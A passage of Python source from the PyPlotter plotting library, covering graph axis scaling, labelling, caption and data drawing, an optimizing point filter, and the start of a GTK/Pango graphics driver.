th = self.gfx.getTextSize("Og")[1]
self.labelSize = int(th * MAGIC_LABELSIZE_FACTOR + 0.5)
else:
self.labelSize = 0
left = self.labelSize
right = 0
if self.styleFlags & CAPTION:
self.gfx.applyPen(self.captionPen, Gfx.FONT)
w, h, th = self._maxCaptionEntrySize()
l, c = self._captionLinesNColumns()
bottom = l * h + th * MAGIC_CAPTIONSIZE_ADD + self.labelSize
sx1, sy1, sx2, sy2 = screenRegion(self.gfx, self.region)
if (bottom + top) > (sy2 - sy1) / 2:
bottom -= (bottom + top) - (sy2 - sy1) / 2
if bottom < 0:
bottom = 0
else:
bottom = self.labelSize
return top, bottom, left, right
def _calcFrame(self):
"""Determines the frame size. Returns True if frame size has
changed.
"""
top, bottom, left, right = self._xcalcFrame()
if top != self.top or bottom != self.bottom or \
left != self.left or right != self.right:
self.adjustFrame(top, bottom, left, right)
return True
else:
return False
def _calcStretchFactors(self):
"""Determines the stretch factors for logarithmic scales."""
self.stretchX = math.log10(self.x2 - self.x1 + 1.0)
self.stretchY = math.log10(self.y2 - self.y1 + 1.0)
def _scaleX(self, x):
"""Maps the x coordinate onto the screen coordinate range."""
if LOG_X & self.styleFlags:
return self.tr.X(math.log10(x) *
(self.x2 - self.x1) / self.stretchX + self.x1)
else:
return self.tr.X(x)
def _scaleY(self, y):
"""Maps the x coordinate onto the screen coordinate range."""
if LOG_Y & self.styleFlags:
return self.tr.Y(math.log10(y) *
(self.y2 - self.y1) / self.stretchY + self.y1)
else:
return self.tr.Y(y)
def _invX(self, x):
if LOG_X & self.styleFlags:
r = self.tr.invX(x) - self.x1
r = r * self.stretchX / (self.x2 - self.x1)
return LOG_BASE ** r
else:
return self.tr.invX(x)
def _invY(self, y):
if LOG_Y & self.styleFlags:
r = self.tr.invY(y) - self.y1
r = r * self.stretchY / (self.y2 - self.y1)
return LOG_BASE ** r
else:
return self.tr.invY(y)
def _axisDivision(self, a, b):
"""Divides a coordinate axis between a and b in a suitable
manner."""
if b - a <= 1.0:
corr = -1.0
else:
corr = 0.0
steps = 10.0 ** int(math.log10((b - a) / 2.0) + corr)
m = round(a / steps) * steps
if m <= a:
m += steps
epsilon = abs(b - a) / 1000.0
l = []
while m < b - epsilon:
l.append(m)
m += steps
return l
def _logAxisDivision(self, a, b):
"""Divides a coordinate axis between a and b logarithmically.
"""
steps = int(math.log10(b - a + 1) + 0.01 / b)
l = []
for i in range(int(a + 0.9999), steps + 1):
l.append(LOG_BASE ** i)
return l
def _XaxisDivision(self):
"""Divides the x axis either linearly or logarithmically
according to the style flags."""
if LOG_X & self.styleFlags:
return self._logAxisDivision(self.x1, self.x2)
else:
return self._axisDivision(self.x1, self.x2)
def _YaxisDivision(self):
"""Divides the x axis either linearly or logarithmically
according to the style flags."""
if LOG_Y & self.styleFlags:
return self._logAxisDivision(self.y1, self.y2)
else:
return self._axisDivision(self.y1, self.y2)
def _clear(self, sx1, sy1, sx2, sy2):
self.gfx.applyPen(self.backgroundPen, Gfx.MASK_FILL)
self.gfx.fillRect(sx1, sy1, sx2 - sx1 + 1, sy2 - sy1 + 1)
def _clearTitle(self):
x1, y1, x2, y2 = self.topFrame()
y1 += 2 # a little bit of tweaking
self._clear(x1, y1, x2, y2)
def _clearGraph(self):
sx1 = self.tr.X(self.x1)
sy1 = self.tr.Y(self.y1)
sx2 = self.tr.X(self.x2)
sy2 = self.tr.Y(self.y2)
self._clear(sx1, sy1, sx2, sy2 + 1) # "+1" is a tweak !
def _clearFullGraph(self):
sx1, sy1, sx2, sy2 = self.innerFrame()
sx1 -= self.labelSize
sy1 -= self.labelSize
self._clear(sx1, sy1, sx2, sy2 + 1) # "+1" is a tweak !
def _clearLabels(self):
sx1 = self.tr.X(self.x1) - 1
sy1 = self.tr.Y(self.y1) - 1
sx2 = self.tr.X(self.x2) + 1
sy2 = self.tr.Y(self.y2) + 1
self.gfx.applyPen(self.backgroundPen, Gfx.MASK_FILL)
self.gfx.fillRect(sx1 - self.labelSize, sy1 + 1, self.labelSize,
sy2 - sy1)
self.gfx.fillRect(sx1 + 1, sy1 - self.labelSize, sx2 - sx1,
self.labelSize)
def _clearCaption(self):
sx1, sy1, sx2, sy2 = self.bottomFrame()
sy2 -= self.labelSize
self._clear(sx1, sy1, sx2, sy2)
def _drawGrid(self):
"""Draws the axises of the coordinate system.
"""
if self.styleFlags & AXISES:
sx1 = self.tr.X(self.x1)
sy1 = self.tr.Y(self.y1)
sx2 = self.tr.X(self.x2)
sy2 = self.tr.Y(self.y2)
if self.y1 <= 0.0:
y = self._scaleY(0.0)
else:
y = self._scaleY(self.y1)
self.gfx.applyPen(self.axisPen, Gfx.MASK_LINE)
self.gfx.drawLine(self.tr.X(self.x1), y, self.tr.X(self.x2), y)
if self.styleFlags & AXIS_DIVISION:
self.gfx.setLineWidth(Gfx.THIN)
sy1 = y - self.dpi / 40 - 1
sy2 = sy1 + self.dpi / 20 + 1
for x in self._XaxisDivision():
sx = self._scaleX(x)
self.gfx.drawLine(sx, sy1, sx, sy2)
self.gfx.setLineWidth(self.axisPen.lineWidth)
if self.x1 <= 0.0:
x = self._scaleX(0.0)
else:
x = self._scaleX(self.x1)
self.gfx.applyPen(self.axisPen, Gfx.MASK_LINE)
self.gfx.drawLine(x, self.tr.Y(self.y1), x, self.tr.Y(self.y2))
if self.styleFlags & AXIS_DIVISION:
self.gfx.setLineWidth(Gfx.THIN)
sx1 = x - self.dpi / 40 - 1
sx2 = sx1 + self.dpi / 20 + 1
for y in self._YaxisDivision():
sy = self._scaleY(y)
self.gfx.drawLine(sx1, sy, sx2, sy)
if self.styleFlags & FULL_GRID:
sx1 = self.tr.X(self.x1)
sy1 = self.tr.Y(self.y1)
sx2 = self.tr.X(self.x2)
sy2 = self.tr.Y(self.y2)
self.gfx.setColor(self.axisPen.color)
self.gfx.setLineWidth(Gfx.THIN)
self.gfx.setLinePattern(Gfx.DOTTED)
for x in self._XaxisDivision():
sx = self._scaleX(x)
self.gfx.drawLine(sx, sy1, sx, sy2)
for y in self._YaxisDivision():
sy = self._scaleY(y)
self.gfx.drawLine(sx1, sy, sx2, sy)
self.gfx.setLineWidth(self.axisPen.lineWidth)
self.gfx.setLinePattern(Gfx.CONTINUOUS)
self.gfx.drawRect(sx1, sy1, sx2 - sx1 + 1, sy2 - sy1 + 1)
def _drawLabels(self):
"""Writes the labels onto the graph.
"""
def fmtNum(f, df):
"""float -> string (nicely rounded and formatted)."""
if f != 0.0:
i = int(round(math.log10(abs(df)))) - 1
else:
i = 0
if i >= 0:
i = 0
else:
i = abs(i)
return ("%." + str(i) + "f") % (round(f, i))
self.gfx.applyPen(self.labelPen, Gfx.MASK_FONT)
sx1 = self.tr.X(self.x1) - 1
sy1 = self.tr.Y(self.y1) - 1
sx2 = self.tr.X(self.x2) + 1
sy2 = self.tr.Y(self.y2) + 1
w, h = self.gfx.getTextSize(self.xaxis)
x = sx1 + (sx2 - sx1 + 1) / 2 - w / 2
y = sy1 - self.labelSize + h / 4
self.gfx.writeStr(x, y, self.xaxis)
w, h = self.gfx.getTextSize("0")
y = sy1 - h * 5 / 4
lastX = -1000000
for x in self._XaxisDivision():
fstr = fmtNum(x, self.x2 - self.x1)
w, h = self.gfx.getTextSize(fstr)
sx = self._scaleX(x) - w / 2
if sx + w > self.tr.sx2:
sx = self.tr.sx2 - w
if sx > lastX + h / 2:
self.gfx.writeStr(sx, y, fstr)
lastX = sx + w
w, h = self.gfx.getTextSize(self.yaxis)
x = sx1 - h * 6 / 4
if len(self.yaxis) >= 2:
y = sy2 - (sy2 - sy1 + 1) / 2 - w / 2
self.gfx.writeStr(x, y, self.yaxis, 90.0)
else:
y = sy2 - (sy2 - sy1 + 1) / 2 - h / 2
self.gfx.writeStr(x - w, y, self.yaxis)
w, h = self.gfx.getTextSize("0")
x = sx1 - h / 4
lastY = -1000000
for y in self._YaxisDivision():
fstr = fmtNum(y, self.y2 - self.y1)
w, h = self.gfx.getTextSize(fstr)
sy = self._scaleY(y) - w / 2
if sy + w > self.tr.sy2:
sy = self.tr.sy2 - w
if sy > lastY + h / 2:
self.gfx.writeStr(x, sy, fstr, 90.0)
lastY = sy + w
def _shuffleDraw(self):
"""Draws the recorded data on the cartesian plane. The order in
which the graphs are drawn is continuously changed, so that
overlapped graphs may still become visible. This results in
Zebra speckled graphs for overlapping curves.
"""
lengthDict = {}
for name, l in self.values.items():
lengthDict[name] = len(l)
n = max(list(lengthDict.values()) + [0])
nameList = list(self.pens.keys())
for name in nameList:
if lengthDict[name] == 1:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
self.gfx.applyPen(pen, Gfx.MASK_LINE)
x, y = self.values[name][0]
if self._inside(x, y):
self.gfx.drawPoint(self._scaleX(x), self._scaleY(y))
for i in range(1, n):
for name in nameList:
if lengthDict[name] > i:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
self.gfx.applyPen(pen, Gfx.MASK_LINE)
x1, y1 = self.values[name][i - 1]
x2, y2 = self.values[name][i]
if self._inside(x1, y1) and self._inside(x2, y2):
self.gfx.x_drawLine(self._scaleX(x1),
self._scaleY(y1),
self._scaleX(x2),
self._scaleY(y2))
random.shuffle(nameList)
def _evadeDraw(self):
"""Draws the recorded data onto the cartesian plane. If
different graphs are overlapping they will be draw next to
each other instead of on top of each other, so that overlapped
graphs may still become visible. This may lead to somewhat
inexact graphs as well as strange artifacts (zigzagged graphs)
in some cases.
"""
pSet = set()
names = list(self.pens.keys())
names.sort()
for name in names:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
if pen.lineWidth == Gfx.THICK:
delta = 3
elif pen.lineWidth == Gfx.MEDIUM:
delta = 2
else:
delta = 1
self.gfx.applyPen(pen, Gfx.MASK_LINE)
poly = []
for x, y in self.values[name]:
if self._inside(x, y):
point = (self._scaleX(x), self._scaleY(y))
while point in pSet:
point = (point[0], point[1] + delta)
pSet.add(point)
poly.append(point)
else:
self.gfx.x_drawPoly(poly)
poly = []
self.gfx.x_drawPoly(poly)
def _drawData(self):
"""Draws the recorded data onto the cartesian plane.
"""
if self.styleFlags & SHUFFLE_DRAW:
self._shuffleDraw()
elif self.styleFlags & EVADE_DRAW:
self._evadeDraw()
else:
for name in self.penOrder:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
self.gfx.applyPen(pen, Gfx.MASK_LINE)
poly = []
for x, y in self.values[name]:
if self._inside(x, y):
poly.append((self._scaleX(x), self._scaleY(y)))
else:
self.gfx.x_drawPoly(poly)
poly = []
self.gfx.x_drawPoly(poly)
def _drawTitle(self):
"""Writes the title of the graph.
"""
sx1, sy1, sx2, sy2 = self.topFrame()
self.gfx.applyPen(self.titlePen, Gfx.MASK_FONT)
w, h = self.gfx.getTextSize(self.titleStr)
x = sx1 + (sx2 - sx1 + 1 - w) / 2
y = sy1 + (sy2 - sy1 + 1 - h) / 2
self.gfx.writeStr(x, y, self.titleStr)
def _drawCaption(self):
"""Writes a description of all pens below the graph.
"""
if self.pens == {}:
return
sx1, sy1, sx2, sy2 = self.bottomFrame()
lines, columns = self._captionLCTuple
w, h, th = self._captionESTuple
y = sy2 - self.labelSize - th * MAGIC_CAPTIONSIZE_ADD / 2 + th / 3
dw = MAGIC_CAPTIONENTRY_EXTEND * th / MAGIC_CPATIONENTRY_DIV
lw = MAGIC_CAPTIONENTRY_EXTEND * th - 2 * dw
penNames = list(self.pens.keys())
penNames.sort()
i = 0
for name in penNames:
if i == 0:
x = sx1 + ((sx2 - sx1 + 1) - w * columns) / 2
#x = sx2 - w * columns
y -= h
i = columns
self.gfx.applyPen(self.pens[name], Gfx.MASK_LINE)
self.gfx.drawLine(x + dw, y + th / 2, x + lw, y + th / 2)
self.gfx.applyPen(self.captionPen, Gfx.MASK_FONT)
self.gfx.writeStr(x + lw + 2 * dw, y, name)
x += w
i -= 1
def _redrawFullGraph(self):
self._clearFullGraph()
self._drawGrid()
self._drawLabels()
self._drawData()
def _inside(self, x, y):
"""Returns True if point (x,y) is inside the graph."""
return (x >= self.x1) and (x <= self.x2) and \
(y >= self.y1) and (y <= self.y2)
def _adjustRangeToPoint(self, x, y):
"""Adjusts the graph range so that point x, y will fall inside
the range.
"""
x1, y1, x2, y2 = self.x1, self.y1, self.x2, self.y2
if x < x1:
x1 = x - abs(x2 - x) * 0.15
elif x > x2:
x2 = x + abs(x - x1) * 0.15
if y < y1:
y1 = y - abs(y2 - y) * 0.15
elif y > y2:
y2 = y + abs(y - y1) * 0.15
self.adjustRange(x1, y1, x2, y2)
def _assertRangeParameters(self):
assert self.x2 > self.x1, "x2 must be greater than x1!"
assert self.y2 > self.y1, "y2 must be greater than y1!"
assert not LOG_X & self.styleFlags or self.x1 >= 1, \
"x1 must be greater or equal 1 when using a logarithmic scale!"
assert not LOG_Y & self.styleFlags or self.y1 >= 1, \
"y1 must be greater or equal 1 when using a logarithmic scale!"
def adjustRange(self, x1, y1, x2, y2):
"""Adjusts the range of the coordinate plane."""
self._assertRangeParameters()
self.x1, self.x2 = x1, x2
self.y1, self.y2 = y1, y2
self._calcStretchFactors()
HardFramedScreen.adjustRange(self, x1, y1, x2, y2)
self._redrawFullGraph()
def setStyle(self, styleFlags=None, axisPen=None, labelPen=None,
titlePen=None, captionPen=None, backgroundPen=None,
redraw=True):
"""Changes the style of the graph. A parameter value of None
means that this parameter shall not be changed.
"""
RD_TITLE, RD_LABELS, RD_CAPTION, RD_GRAPH = [2 ** i for i in range(4)]
RD_NONE = 0
RD_ALL = RD_TITLE | RD_LABELS | RD_CAPTION | RD_GRAPH
redrawFlags = RD_NONE
updateGeometry = False
oldStyleFlags = self.styleFlags
if styleFlags != None:
if (MASK_LAYOUT & styleFlags) != (MASK_LAYOUT & self.styleFlags):
self._assertRangeParameters()
updateGeometry = True
redrawFlags |= RD_ALL
elif (MASK_GRAPHSTYLE & styleFlags) != \
(MASK_GRAPHSTYLE & self.styleFlags):
redrawFlags |= RD_GRAPH
elif ((LOG_X | LOG_Y) & styleFlags) != \
((LOG_X | LOG_Y) & self.styleFlags):
redrawFlags |= RD_LABELS | RD_GRAPH
self.styleFlags = styleFlags
else:
styleFlags = 0
if axisPen != None:
self.axisPen = axisPen
redrawFlags |= RD_GRAPH
if labelPen != None:
self.labelPen = labelPen
redrawFlags |= RD_LABELS
if titlePen != None:
self.titlePen = titlePen
redrawFlags |= RD_TITLE
if backgroundPen != None:
self.backgroundPen = backgroundPen
redrawFlags |= RD_ALL
if captionPen != None:
if self.captionPen.fontSize != captionPen.fontSize:
redrawFlags |= RD_ALL
updateGeometry = True
else:
redrawFlags |= RD_CAPTION
self.captionPen = captionPen
if oldStyleFlags & AUTO_ADJUST and \
not self.styleFlags & AUTO_ADJUST:
x1, y1, x2, y2 = self.x1, self.y1, self.x2, self.y2
for name in self.pens.keys():
for x, y in self.values[name]:
if x < x1:
x1 = x
elif x > x2:
x2 = x
if y < y1:
y1 = y
elif y > y2:
y2 = y
self.adjustRange(x1, y1, x2, y2) # implies redraw
redrawFlags &= ~RD_GRAPH
elif oldStyleFlags & KEEP_ASPECT and \
not self.styleFlags & KEEP_ASPECT:
redrawFlags |= RD_GRAPH
if updateGeometry:
self._calcFrame()
if redraw:
if redrawFlags == RD_ALL:
self.redraw()
else:
if redrawFlags & RD_TITLE:
self._clearTitle()
self._drawTitle()
if redrawFlags & RD_CAPTION:
self._clearCaption()
self._drawCaption()
if (redrawFlags & RD_LABELS) and (redrawFlags & RD_GRAPH):
self._redrawFullGraph()
else:
if redrawFlags & RD_LABELS:
self._clearLabels()
self._drawLabels()
elif redrawFlags & RD_GRAPH:
self._clearGraph()
self._drawGrid()
self._drawData()
def setTitle(self, title):
"""Changes the title of the graph."""
self.titleStr = title
self._clearTitle()
self._drawTitle()
def setLabels(self, xaxis=None, yaxis=None):
"""Changes the labeling of the graph."""
if xaxis != None:
self.xaxis = xaxis
if yaxis != None:
self.yaxis = yaxis
if self.styleFlags & LABELS:
self._clearLabels()
self._drawLabels()
def resizedGfx(self):
HardFramedScreen.resizedGfx(self)
self._calcFrame()
self.redraw()
def changeGfx(self, gfx):
self.dpi = gfx.getResolution()
return HardFramedScreen.changeGfx(self, gfx)
def dumpPostscript(self, fileName):
"""Saves the contents of the graph as postscript file."""
if fileName[-4:] == ".eps" and fileName[-3:] == ".ps":
fileName += ".ps"
driver = psGfx.Driver()
oldGfx = self.changeGfx(driver)
driver.save(fileName)
self.changeGfx(oldGfx)
def redrawGraph(self):
"""Redraws only the graph."""
self._clearGraph()
self._drawGrid()
self._drawData()
def redrawCaption(self):
"""Redraws the caption region."""
if self.styleFlags & CAPTION:
if self._calcFrame():
self._redrawFullGraph()
self._clearCaption()
self._drawCaption()
def redraw(self):
"""Redraws everything: the graph as well as the title and
the caption."""
self._clear(self.sx1, self.sy1, self.sx2, self.sy2)
self._drawGrid()
if self.styleFlags & LABELS:
self._drawLabels()
self._drawData()
if self.styleFlags & CAPTION:
self._drawCaption()
if self.styleFlags & TITLE:
self._drawTitle()
def reset(self, x1, y1, x2, y2):
"""Removes all pens and readjusts the range of the coordinate plane.
"""
self.pens = {}
self.values = {}
self.penOrder = []
self.adjustRange(x1, y1, x2, y2)
def addPen(self, name, pen=AUTO_GENERATE_PEN, updateCaption=True):
"""Adds a new pen."""
if isinstance(pen, AutoPen):
pen = copy.deepcopy(pen)
pen.color = Colors.colors[self.colorIndex]
self.colorIndex += 1
if self.colorIndex >= len(Colors.colors):
self.colorIndex = 0
self.penOrder.append(name)
self.pens[name] = pen
self.values[name] = []
if updateCaption:
self.redrawCaption()
def exchangePen(self, name, pen, redraw=True):
"""Changes the color and attributes of a pen."""
assert name in self.pens, "Cannot exchange pen '" +\
name + "' because it did not exist."
self.pens[name] = pen
if redraw:
self.redrawCaption()
if self.values[name]:
self.redrawGraph()
def removePen(self, name, redraw=True):
"""Removes a pen."""
del self.pens[name]
self.penOrder.remove(name)
flag = self.values[name] != []
del self.values[name]
if flag and redraw:
self.redrawGraph()
def addValue(self, name, x, y):
"""Adds another value to the value table of the pen named 'name'.
"""
# if not self._inside(x, y):
# if self.styleFlags & AUTO_ADJUST:
# self._adjustRangeToPoint(x, y)
# else: return
# self.values[name].append((x,y))
if name not in self.pens and AUTO_PEN & self.styleFlags:
self.addPen(name)
vl = self.values[name]
vl.append((x, y))
if not self._inside(x, y):
if self.styleFlags & AUTO_ADJUST:
self._adjustRangeToPoint(x, y)
else:
return
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
return
self.gfx.applyPen(pen, Gfx.MASK_LINE)
if len(vl) > 1 and self._inside(vl[-2][0], vl[-2][1]):
x1, y1 = vl[-2]
self.gfx.x_drawLine(self._scaleX(x1), self._scaleY(y1),
self._scaleX(x), self._scaleY(y))
else:
self.gfx.drawPoint(self._scaleX(x), self._scaleY(y))
def peek(self, x, y):
"""screen coordinates -> coordinates on the graph."""
return (self._invX(x), self._invY(y))
def xaxisSteps(self, x1, x2):
"""-> List of virtual x-coordinates with one point for
each screen pixel."""
a = self._scaleX(x1)
b = self._scaleX(x2)
# use b+2 istead of b+1 to avoid some stange
return list(map(self._invX, list(range(a, b + 1))))
# range errors!
def yaxisSteps(self, y1, y2):
"""-> List of virtual x-coordinates with one point for
each screen pixel."""
a = self._scaleY(y1)
b = self._scaleY(y2)
return list(map(self._invY, list(range(a, b + 1))))
# uncomment the following to break jython compatibility ;)
# def xaxisIter(self, x1, x2):
# """-> iterate over virtual x-coordinates with one point for
# each screen pixel."""
## a = self._scaleX(x1); b = self._scaleX(x2)
# for x in xrange(a, b+2): yield self._invX(x)
##
# def yaxisIter(self, y1, y2):
# """-> iterate over virtual x-coordinates with one point for
# each screen pixel."""
## a = self._scaleY(y1); b = self._scaleY(y2)
# for y in xrange(a, b+2): yield self._invY(y)
# saving the graph (not yet tested)!
# def reprGraph(self, withPens = False, lineFeeds = False):
# """Returns a string representation of the graph, including
# pen names, pens (optional) and value lists."""
# if lineFeeds:
## lf = "\n"; spc = " "
# else:
## lf = ""; spc = ""
## sl = ["[", lf]
# for name in self.penOrder:
## sl.extend(spc, "[", repr(name), ",", spc)
# if withPens:
## sl.extend(repr(self.pens[name]), ",", spc, lf)
## sl.extend(spc, spc, repr(self.values[name]), lf, spc, "]", lf)
## sl.extend("]", lf)
# return "".join(sl)
# def saveGraph(self, fName):
# """Saves the vectors of the graph to a file named 'fName'.
# Returns true, if successful."""
# try:
## f = file(fName, "w")
# except IOError:
# return False
# try:
# f.write(self.reprGraph())
# except IOError:
## ret = False
# else:
## ret = True
# f.close()
# return ret
########################################################################
#
# class OptimizingFilter
#
########################################################################
OPT_DONT, OPT_X, OPT_Y = [2 ** i for i in range(3)]
class OptimizingFilter(object):
"""Optimizes the the output on a graph on screen for speed
(at a possible cost of accuracy) by leaving out all those
points that have the same screen X- (or Y-) coordinate as the the
last added point.
The optimization is most usefull if the domain of the graph is
much larger than the screen resolution. Since only one the first
Y (resp. X) value is drawn for each X (resp Y) value the optimized
graph might actually look different than the full graph, although
this should not matter in most cases. Since points that are filtered
out are simply dropped and thus do not occur in the value list of
the graph object, it is not possible to regain accuracy by zooming
or resizing the window. Instead it will be necessary to recalculate
the graph. (This is the cost for the speed and memory benefits
gained by using the optimizing filter.)
Attributes:
graph - Graph object: the graph that is used for drawing
flags - int (bitset): the flags that determine the behaviour
of the optimizer: OPT_DONT turns of Optimization (this
allows switching between optimized and non optimized
output without putting another if clause into the drawing
loop). OPT_X and OPT_Y determine whether the x or the y
value is to be regared as the independend variable.
"""
def __init__(self, graph, flags=OPT_X):
assert bitsum((OPT_X | OPT_Y) & flags) != 1, \
"Orientation not given or ambiguous !"
self.graph = graph
self.flags = flags
self.graphChanged()
def graphChanged(self):
"""Takes notice of a readjusted or resized graph.
"""
if OPT_X & self.flags:
self.steps = self.graph.xaxisSteps(self.graph.x1,
self.graph.x2)
else:
self.steps = self.graph.yaxisSteps(self.graph.y1,
self.graph.y2)
self.index = {}
def addValue(self, name, x, y):
"""Adds a point to the graph only if the screen X (resp. Y)
coordinate differs from the last point.
"""
if OPT_X & self.flags:
pos = x
else:
pos = y
if not (OPT_DONT & self.flags):
try:
if pos >= self.steps[self.index.setdefault(name, 0)]:
self.index[name] += 1
self.graph.addValue(name, x, y)
except IndexError:
pass # index errors mean that pos is out of range anyway
else:
self.graph.addValue(name, x, y)
########################################################################
#
# Tests
#
########################################################################
if __name__ == "__main__":
import systemTest
# systemTest.Test_Graph()
systemTest.Test_GraphLg()
```
#### File: CoopSim/PyPlotter/gtkGfx.py
```python
import math
import gtk, pango
from gtk import gdk
try:
import Gfx
except ImportError:
from . import Gfx
try:
from Compatibility import *
except ImportError:
from . import Compatiblity
globals().update(Compatibility.__dict__)
driverName = "gtkGfx"
########################################################################
#
# class Driver
#
########################################################################
stipple_Solid = gdk.bitmap_create_from_data(None,
"\xff\xff\xff\xff\xff\xff\xff\xff", 8, 8)
stipple_PatternA = gdk.bitmap_create_from_data(None,
"\xcc\x99\x33\x66\xcc\x99\x33\x66", 8, 8)
stipple_PatternB = gdk.bitmap_create_from_data(None,
"\xcc\x66\x33\x99\xcc\x66\x33\x99", 8, 8)
stipple_PatternC = gdk.bitmap_create_from_data(None,
"\xc3\x66\x3c\x99\xc3\x66\x3c\x99", 8, 8)
white = gdk.color_parse("white")
black = gdk.color_parse("black")
class PangoContextWrapper(pango.Context):
def __init__(self):
pass
class Driver(Gfx.Driver):
"""A simple graphics layer on top of gdk.
See Gfx.py
"""
def __init__(self, gtk_widget, pango_layout):
"""Initialize canvas on a gdk drawable."""
Gfx.Driver.__init__(self)
self.pango_layout = pango_layout
self.pango_context = self.pango_layout.get_context()
self.pango_font = self.pango_context.get_font_description()
self.gtk_widget = gtk_widget
self.changeDrawable(gtk_widget.window)
def changeDrawable(self, drawable, pango_layout=None):
"""Change the drawable"""
## self.pango_font_desc = pango.FontDescription()
## self.pango_context = PangoContextWrapper()
## self.pango_context_set_font_description(self.pango_font_desc)
if pango_layout != None: self.pango_layout = pango_layout
self.drawable = drawable
if self.drawable:
self.gc = gdk.GC(self.drawable)
self.resizedGfx()
else: self.gc = None
self.gc_thickness = 1
self.gc_line_style = gdk.LINE_SOLID
self.gc_cap_style = gdk.CAP_ROUND
self.gc_join_style = gdk.JOIN_MITER
if self.gc:
self.w, self.h = self.drawable.get_size()
self.reset()
else: self.w, self.h = 0, 0
def resizedGfx(self):
self.w, self.h = self.drawable.get_size()
def getSize(self):
return self.w, self.h
def getResolution(self):
return 100
def __gdkColor(self, rgbTuple):
return gdk.Color(int(round(rgbTuple[0]*65535)),
int(round(rgbTuple[1]*65535)),
int(round(rgbTuple[2]*65535)))
def setColor(self, rgbTuple):
self.gc.set_rgb_fg_color(self.__gdkColor(rgbTuple))
# self.gc.set_rgb_bg_color(self.__gdkColor(rgbTuple))
self.color = rgbTuple
def setLineWidth(self, width):
self.lineWidth = width
if width == Gfx.THIN: self.gc_thickness = 1
elif width == Gfx.MEDIUM: self.gc_thickness = 2
elif width == Gfx.THICK: self.gc_thickness = 3
else: raise ValueError("'thickness' must be 'thin', 'medium' or 'thick' !")
self.gc.set_line_attributes(self.gc_thickness,
self.gc_line_style,
self.gc_cap_style,
self.gc_join_style)
def setLinePattern(self, pattern):
self.linePattern = pattern
if pattern == Gfx.CONTINUOUS:
self.gc_line_style = gdk.LINE_SOLID
elif pattern == Gfx.DASHED:
self.gc_line_style = gdk.LINE_ON_OFF_DASH
self.gc.set_dashes(0, (5, 5))
elif pattern == Gfx.DOTTED:
self.gc_line_style = gdk.LINE_ON_OFF_DASH
self.gc.set_dashes(0, (1, 4))
else: raise ValueError("'pattern' must be 'continuous', " + \
"'dashed' or 'dotted' !")
self.gc.set_line_attributes(self.gc_thickness,
self.gc_line_style,
self.gc_cap_style,
self.gc_join_style)
def setFillPattern(self, pattern):
self.fillPattern = pattern
if pattern == Gfx.SOLID:
fp = gdk.SOLID
pat = stipple_Solid
elif pattern == Gfx.PATTERN_A:
fp = gdk.STIPPLED
pat = stipple_PatternA
elif pattern == Gfx.PATTERN_B:
fp = gdk.STIPPLED
pat = stipple_PatternB
elif pattern == Gfx.PATTERN_C:
fp = gdk.STIPPLED
pat = stipple_PatternC
else: raise ValueError("'pattern' must be 'solid' or 'patternA', " + \
"'patternB', 'patternC' !")
self.gc.set_fill(fp)
self.gc.set_stipple(pat)
def setFont(self, ftype, size, weight):
self.fontType = ftype
self.fontSize = size
self.fontWeight = weight
if ftype == Gfx.SANS: ff = "sans"
elif ftype == Gfx.SERIF: ff = "serif"
elif ftype == Gfx.FIXED: ff = "monospace"
else: raise ValueError("'type' must be 'sans', 'serif' or 'fixed' !")
if size == Gfx.SMALL: fs = 5
elif size == Gfx.NORMAL: fs = 10
elif size == Gfx.LARGE: fs = 20
else: raise ValueError("'size' must be 'small', 'normal' or 'large' !")
fst = pango.STYLE_NORMAL
fw = pango.WEIGHT_NORMAL
if "i" in weight: fst = pango.STYLE_ITALIC
elif "b" in weight: fw = pango.WEIGHT_BOLD
self.pango_font.set_family(ff)
self.pango_font.set_size(fs*pango.SCALE)
self.pango_font.set_style(fst)
self.pango_font.set_weight(fw)
self.pango_layout.set_font_description(self.pango_font)
def getTextSize(self, text):
self.pango_layout.set_text(text)
return self.pango_layout.get_pixel_size()
## def selectFontSize(self, text, w,h):
## for fs in range(3,0,-1):
## self.setFont(self, self.fontType, fs, self.fontWeight)
## sw,sh = self.getTextSize(text)
## if sw <= w and sh <= h: break
## else:
## return 0
## return 1
def drawPoint(self, x, y):
self.drawable.draw_point(self.gc, x, self.h-y-1)
def __checkInLine(self):
if self.linePattern != Gfx.CONTINUOUS and \
self.fillPattern != Gfx.SOLID:
self.gc.set_fill(gdk.SOLID)
def __checkOutLine(self):
if self.linePattern != Gfx.CONTINUOUS and \
self.fillPattern != Gfx.SOLID:
self.gc.set_fill(gdk.STIPPLED)
def drawLine(self, x1, y1, x2, y2):
self.__checkInLine()
self.drawable.draw_line(self.gc, x1, self.h-y1-1, x2, self.h-y2-1)
self.__checkOutLine()
def drawRect(self, x, y, w, h):
self.__checkInLine()
self.drawable.draw_rectangle(self.gc,False,x,self.h-y-h,w-1,h-1)
self.__checkOutLine()
def drawPoly(self, array):
if array:
transformed = [(x, self.h-y-1) for x,y in array]
self.__checkInLine()
self.drawable.draw_lines(self.gc, transformed)
self.__checkOutLine()
def fillRect(self, x, y, w, h):
self.drawable.draw_rectangle(self.gc,True,x,self.h-y-h,w,h)
def fillPoly(self, array):
transformed = [(x, self.h-y-1) for x,y in array]
self.drawable.draw_polygon(self.gc, True, transformed)
def writeStr(self, x, y, str, rotationAngle=0.0):
self.pango_layout.set_text(str)
w, h = self.pango_layout.get_pixel_size()
if rotationAngle == 0.0:
self.drawable.draw_layout(self.gc, x, self.h-y-h,
self.pango_layout)
else:
a = rotationAngle / 180.0 * math.pi
da = math.atan2(h,0)-a
dw = int(h*math.cos(da)+0.5)
dh = int(h*math.sin(da)+0.5)-h
pixmap = gdk.Pixmap(self.drawable, w, h)
gc = gdk.GC(pixmap)
gc.set_rgb_fg_color(black)
gc.set_fill(gdk.SOLID)
pixmap.draw_rectangle(gc, True, 0, 0, w, h)
gc.set_rgb_fg_color(white)
pixmap.draw_layout(gc, 0, 0, self.pango_layout)
image = pixmap.get_image(0, 0, w, h)
for dy in range(h):
for dx in range(w):
if (image.get_pixel(dx, dy) & 0x808080)!= 0:
r = math.sqrt(dx**2+dy**2)
da = math.atan2(dy,dx) - a
xx = int(r * math.cos(da)+0.5)
yy = int(r * math.sin(da)+0.5)
self.drawable.draw_point(self.gc, x+xx-dw,
self.h-y-h+yy-dh)
########################################################################
#
# class Window
#
########################################################################
class Window(Driver, Gfx.Window):
